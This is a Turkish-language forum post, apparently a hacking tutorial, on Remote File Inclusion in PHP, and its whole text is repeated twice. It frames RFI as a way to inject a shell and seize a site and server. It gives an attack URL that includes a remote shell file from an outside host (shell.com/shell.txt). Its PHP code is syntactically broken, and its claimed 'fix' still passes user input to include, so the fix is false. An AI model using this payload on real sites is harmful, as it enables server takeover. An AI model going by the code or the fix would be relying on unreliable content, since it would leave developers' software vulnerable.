- Katılım
- 3 Eki 2016
- Tepki puanı
- 0
Rating - 0%
Öncelikle Selamun Aleyküm ...
RFİ Açığı, uzaktan dosya eklemeye yarar bizde zararlı kod yani shell enjekte ederek siteyi ve sunucuyu ele geçirebiliriz.
Ben yine doğaçlama olarak, senaryo üzerinden gideceğim.
Zafiyet, websitem/hack.php?hack= değerinde bulunmaktadır. Hemen hack.php dosyamizi aciyoruz ve include komutuna bakıyoruz.
include($_GET["hack")
Zafiyet, include komutunda gerçekleşir ve uzaktan dosya dâhil etmeye yarar. Burada hack diye bir değer açılmış, ama boş bir değer. Ucu açık bir değer. Biz buna uzaktan dosya dahil edebiliriz.
websitem/hack.php?hack=http://shell.com/shell.txt
Şeklinde shell dahil edebiliyoruz.
Gelelim fixlemeye;
Az önceki hack değerinde tanımlama yoktu, içi boştu ve bizde dosya dâhil ediyorduk.
Şimdi tanımlayalım;
include($_GET["hack")
Bu kodu siliyoruz böyle değiştiriyoruz;
$hack = $_GET;
include ($hack);
Evet degerimizi tanimladik. Ve zafiyet fixlenmis olacaktır.
RFİ Açığı, uzaktan dosya eklemeye yarar bizde zararlı kod yani shell enjekte ederek siteyi ve sunucuyu ele geçirebiliriz.
Ben yine doğaçlama olarak, senaryo üzerinden gideceğim.
Zafiyet, websitem/hack.php?hack= değerinde bulunmaktadır. Hemen hack.php dosyamizi aciyoruz ve include komutuna bakıyoruz.
include($_GET["hack")
Zafiyet, include komutunda gerçekleşir ve uzaktan dosya dâhil etmeye yarar. Burada hack diye bir değer açılmış, ama boş bir değer. Ucu açık bir değer. Biz buna uzaktan dosya dahil edebiliriz.
websitem/hack.php?hack=http://shell.com/shell.txt
Şeklinde shell dahil edebiliyoruz.
Gelelim fixlemeye;
Az önceki hack değerinde tanımlama yoktu, içi boştu ve bizde dosya dâhil ediyorduk.
Şimdi tanımlayalım;
include($_GET["hack")
Bu kodu siliyoruz böyle değiştiriyoruz;
$hack = $_GET;
include ($hack);
Evet degerimizi tanimladik. Ve zafiyet fixlenmis olacaktır.
